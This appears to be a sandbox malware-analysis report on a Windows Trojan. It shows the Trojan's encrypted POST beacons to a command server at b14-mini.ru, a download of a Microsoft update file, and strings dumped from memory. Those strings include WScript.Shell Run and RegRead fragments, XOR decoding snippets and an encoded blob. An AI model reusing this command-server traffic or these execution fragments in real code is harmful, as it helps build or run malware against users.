POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 228
Cache-Control: no-cache
eWxC3ZA BVyaiiA05XpdFGjklsf/IDKO49Tab03bBhEqjfh jLKoB26Qb75F6DQjrK1ygUaiQWBpHcgKsPfgT0 zAn2ie55vAsuuB2xSDTVcn8rxV4IsKXmmiqoBtXOaPo4zsKPh7Bh31agsiGq0qEFLfkECUC9kVIr5uvUOjoQejY9ndCTPMdICiN8Li4hY4LRlZ/cSmLSLBXYzAD8MWBKYdgH43o1ostKJ
HTTP/1.1 404 Not Found
Date: Thu, 16 Jul 2015 02:18:43 GMT
Server: Apache/2.2.15 (CentOS) DAV/2
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.<hr>.<address>Apache/2.2.15 (CentOS) DAV/2 Server at b14-mini.ru Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Thu, 16 Jul 2015 02:18:43 GMT..Server: Apache/2.2.15 (CentOS) DAV/2..Content-Length: 291..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.<hr>.<address>Apache/2.2.15 (CentOS) DAV/2 Server at b14-mini.ru Port 80</address>.</body></html>...
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: b14-mini.ru
Content-Length: 216
Cache-Control: no-cache
cm0SipY VMeNXYn5/qx4YL2MbCl/yRLfK9iSMIlt29YJM8txkj57TEinAkkLvbwLfjmCy/07WknUE9roKCxZcVw i1QR9D/Fw0RVytrIGFbmX1KRrF0tDsVOQiQlIalQFDFRUbLp3DXedJWmxWzP1/kEHAcByvuYnY 5vmQEQg7UzPI1onNfo0MvwM5LQhI/0kcldXeN8vZikiaa4 EfIk6B
HTTP/1.1 404 Not Found
Date: Thu, 16 Jul 2015 02:18:43 GMT
Server: Apache/2.2.15 (CentOS) DAV/2
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.<hr>.<address>Apache/2.2.15 (CentOS) DAV/2 Server at b14-mini.ru Port 80</address>.</body></html>.HTTP/1.1 404 Not Found..Date: Thu, 16 Jul 2015 02:18:43 GMT..Server: Apache/2.2.15 (CentOS) DAV/2..Content-Length: 291..Content-Type: text/html; charset=iso-8859-1..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.<hr>.<address>Apache/2.2.15 (CentOS) DAV/2 Server at b14-mini.ru Port 80</address>.</body></html>...
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MS-CV=tfQUF9cAt0GGFYxz.1
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Thu, 16 Jul 2015 02:18:44 GMT
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_640:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Kernel32.dll
Kernel32.dll
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
"svchost.exe"
"svchost.exe"
svchost.exe
svchost.exe
ole32.dll
ole32.dll
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
hXXp://
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
GetCPInfo
GetCPInfo
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
atl.dll
atl.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
?"?&?*?.?
?"?&?*?.?
11
11
3,313[3`3
3,313[3`3
6 7%7s7
6 7%7s7
56O6\6n6
56O6\6n6
4.434[4`4
4.434[4`4
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1 833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan 